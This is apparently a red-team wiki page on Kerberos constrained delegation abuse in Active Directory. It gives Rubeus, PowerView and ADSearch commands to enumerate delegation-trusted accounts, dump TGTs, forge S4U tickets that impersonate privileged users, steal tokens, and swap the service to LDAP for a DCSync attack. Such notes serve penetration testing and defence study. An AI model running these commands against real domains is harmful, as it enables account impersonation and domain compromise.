Constrained Delegation - CraigDonkin/Infrastructure GitHub Wiki

Trust this computer for delegation to specified services only

  • Delegation allows a user or computer to impersonate another account, so they can access resources.
  • You can restrict what services the user or computer can impersonate. This is constrained delegation. If you don't use this option then it is unconstrained delegation.
  • For example, a server (A) could be trusted to delegate for the CIFS service on another server (B) . So server A could impersonate any user to the cifs service on Server B.
  • Server A does not cache TGTs of users, but it can request a TGS for another user with its own TGT.
  • It is not possible to impersonate users who are marked as Account is sensitive and cannot be delegated in AD.
  • From a red team perspective, if you compromise a machine with constrained delegation, you can impersonate any user to the service that is being delegated.

Enumerate computers permitted for constrained delegation

  • Powerview:
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
  • PowerShell
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
  • ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json

Getting TGT

  • Need the TGT of the computer or user trusted for delegation

  • With Rubeus get the LUID:

Rubeus.exe triage
  • Then use dump to get the ticket:
Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap

Delegation with S4U and S4U2Proxy

  • Need to get a TGS for the service on the target.
  • Can target any user but choose someone with high privileges.
Rubeus.exe s4u /impersonateuser:<user to impersonate> /msdsspn:<SPN that the victim can delegate to> /user:<user or machine trusted for delegation> /ticket:<TGT for account in /user> /nowrap
  • Then pass the SPN ticket into a new logon session
Rubeus.exe createnetonly /program:<program to run> /domain:<domain> /user:<user you are impersonating> /password:<fake passsword> /ticket:<from S4U2Proxy>
  • Then steal the token to impersonate the user
steal_token <pid from createnetonly command>

Altservice

  • The SPN information in a ticket, is not encrypted and can be changed using the /altservice.
Rubeus.exe s4u /impersonateuser:<user to be impersonated> /msdsspn:<SPN that /user can delegate to> /user:<user with delegation rights> /altservice:ldap /ticket:<TGT for /user>
  • LDAP would allow a dcsync attack
⚠️ **GitHub.com Fallback** ⚠️